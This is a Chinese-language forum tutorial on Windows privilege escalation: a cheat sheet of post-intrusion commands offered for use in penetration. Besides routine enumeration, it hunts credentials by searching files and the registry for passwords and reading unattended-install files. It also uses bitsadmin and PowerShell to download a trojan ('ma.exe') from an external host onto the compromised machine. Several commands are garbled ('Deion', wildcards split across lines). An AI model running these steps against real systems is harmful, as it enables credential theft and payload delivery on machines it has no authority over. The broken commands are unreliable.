Windows提权基础
安天365 simeon
在渗透过程中很多人都认为Windows提权很难,其核心是掌握的基础不够扎实,当然除了极为变态的权限设置的服务器,基本上笔者遇到的服务器99%都提权成功了,本文收集整理一些跟提权特别紧密信息收集技巧和方法,以及如何在kali中搜索可用的漏洞,最后整理了目前可供使用的一些漏洞对应msf下的模块以及操作系统可提权的版本。
1.Windows提权信息收集
1.收集OS名称和版本信息
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
systeminfo | findstr /B /C:"OS 名称" /C:"OS 版本"
2.主机名称和所有环境变量
(1)主机名称:hostname
(2)环境变量:SET
3.查看用户信息
(1)查看所有用户:net user 或者net1 user
(2)查看管理员用户组:net localgroup administrators或者net1 localgroup administrators
(3)查看远程终端在线用户:query user 或者quser
4.查看远程端口
(1)注册表查看REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
(2)通过命令行查看
获取对应的PID号:tasklist /svc | find "TermService"
通过PID号查找端口:netstat -ano | find "1980"
5.查看网络情况
(1)网络配置情况:ipconfig /all
(2)路由器信息: route print
(3)要查看ARP缓存: arp -A
(4)查看网络连接: netstat -ano
(5)要查看防火墙规则:
netsh firewall show config
netsh firewall show state
6.应用程序和服务
(1)要查看服务的进程ID:tasklist /SVC
(2)已安装驱动程序的列表:DRIVERQUERY
(3)已经启动Windows 服务net start
(4)查看某服务启动权限:sc qc TermService
(5)已安装程序的列表:wmic product list brief
(6)查看服务列表:wmic service list brief # Lists services
(7)查看进程列表wmic process list brief # Lists processes
(8)查看启动程序列表wmic startup list brief # Lists startup items
(9)检查补丁已安装的更新和安装日期
wmic qfe get Caption,Deion,HotFixID,InstalledOn
搜索,您可以使用提升权限的特定漏洞:
wmic qfe get Caption,De
ion,HotFixID,InstalledOn | findstr  /C:"KBxxxxxxx"
执行上面的命令的没有输出,意味着那个补丁未安装。
(10)结束程序:wmic process where name="iexplore.exe" call terminate
7.检索敏感文件
dir /b/s password.txt
dir /b /s .doc
dir /b /s
.ppt
dir /b /s .xls
dir /b /s
. docx
dir /b /s .xlsx
dir /b/s config.
filesystem
findstr /si password .xml .ini .txt
findstr /si login
.xml .ini .txt
除此之外,您还可以检查无人值守安装日志文件。这些文件通常包含base64编码的密码。你更可能在大型企业中,其中单个系统的手动安装是不切实际的,找到这些文件即可获取管理员密码。这些文件的共同位置是:
C:\sysprep.inf
C:\sysprep\sysprep.xml
C:\Windows\Panther\Unattend\Unattended.xml
C:\Windows\Panther\Unattended.xml
8.目录文件操作
(1)列出d:\www的所有目录:
for /d %i in (d:\www*) do @echo %i
(2)把当前路径下文件夹的名字只有1-3个字母的显示出来:
for /d %i in (???) do @echo %i
(3)以当前目录为搜索路径,把当前目录与下面的子目录的全部EXE文件列出:
for /r %i in (.exe) do @echo %i
(4)以指定目录为搜索路径,把当前目录与下面的子目录的所有文件列出
for /r "f:\freehost\hmadesign\web\" %i in (
.) do @echo %i
(5)显示a.txt里面的内容,因为/f的作用,会读出a.txt中:
for /f %i in (c:\1.txt) do echo %i
9.RAR打包
  rar a -k -r -s -m3 c:\1.rar d:\wwwroot
10.php读文件
c:/php/php.exe "c:/www/admin/1.php"
11.Windows7及以上的版本操作系统文件下载可以使用的bitsadmin和powershell:
bitsadmin /transfer myjob1 /download /priority normal http://www.antian365.com/lab/4433.exe c:\ma.exe
powershell (new-object System.Net.WebClient).DownloadFile(' http://www.antian365.com/ma.exe','ma.exe')
12.注册表关键字搜索,password为关键字,可以是vnc等敏感关键字
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
13.系统权限配置
cacls c:\
cacls c:\windows\ma.exe 查看ma.exe的权限配置
14.自动收集系统有用信息脚本
for /f "delims=" %%A in ('dir /s /b %WINDIR%\system32\
htable.xsl') do set "var=%%A"
wmic process get CSName,Description,ExecutablePath,ProcessId /format:"%var%" >> out.html
wmic service get Caption,Name,PathName,ServiceType,Started,StartMode,StartName /format:"%var%" >> out.html
wmic USERACCOUNT list full /format:"%var%" >> out.html
wmic group list full /format:"%var%" >> out.html
wmic nicconfig where IPEnabled='true' get Caption,DefaultIPGateway,Description,DHCPEnabled,DHCPServer,IPAddress,IPSubnet,MACAddress /format:"%var%" >> out.html

点击收藏 | 2 关注 | 0
  • 动动手指,沙发就是你的了!
登录 后跟帖